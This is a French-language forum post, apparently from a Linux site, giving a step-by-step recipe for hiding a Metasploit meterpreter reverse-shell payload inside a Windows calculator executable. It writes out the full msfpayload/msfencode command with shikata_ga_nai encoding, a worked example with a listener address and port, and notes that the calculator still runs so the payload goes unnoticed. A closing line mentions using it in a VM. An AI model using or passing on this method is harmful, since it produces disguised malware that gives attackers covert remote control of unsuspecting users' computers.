user@linuxtrack:~ $ python -c 'print("Soyez les bienvenus !")'

Vous n'êtes pas identifié(e).

#1 21-02-2013 00:05:08

boost
Membre

payload caché dans un .exe

bonjour, voici comment caché un payload dans un .exe.
Tous dabord télécharger une calculatrice windows, il y en a plein sur la toile et déposez la sur votre bureau.
En suite, se mettre dans le répertoire du framework3 et la lancer cette commande:

./msfpayload windows/meterpreter/reverse_tcp LHOST=votreip LPORT=votreport R |./msfencode -t exe -x /root/Desktop/votrecalculette.exe -k -o /root/Desktop/lefichierdesortie.exe -e x86/shikata_ga_nai -c 5

voila chez moi ça donne:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 R LPORT=4444 |./msfencode -t exe -x /root/Desktop/calc.exe -k -o /root/Desktop/calc_pro.exe -e x86/shikata_ga_nai -c 5

voila votre payload est caché dans la calculatrice le fichier calc_pro.exe contient mon payload, n'oublier pas de rendre calc_pro.exe exécutable.
Démarrer votre serveur en écoute et exécuter calc_pro.exe sous windows vous remarquez que la calculatrice démarre et le payload démarre aussi et passe inaperçu.



La calculette peut ne pas se lancer. Dans se cas réessayer avec un autre fichier exécutable.
Cette manip fonctionne aussi sous backbox

Personnes n'est censé ignorer la lois !!! À utiliser dans une vm!!!

Dernière modification par boost (22-02-2013 23:00:53)


boost ===>>> « Un langage de programmation est une convention pour donner des ordres à un ordinateur. Ce n’est pas censé être obscur, bizarre et plein de pièges subtils. Ca, ce sont les caractéristiques de la magie. » - Dave Small

Hors ligne

Pied de page des forums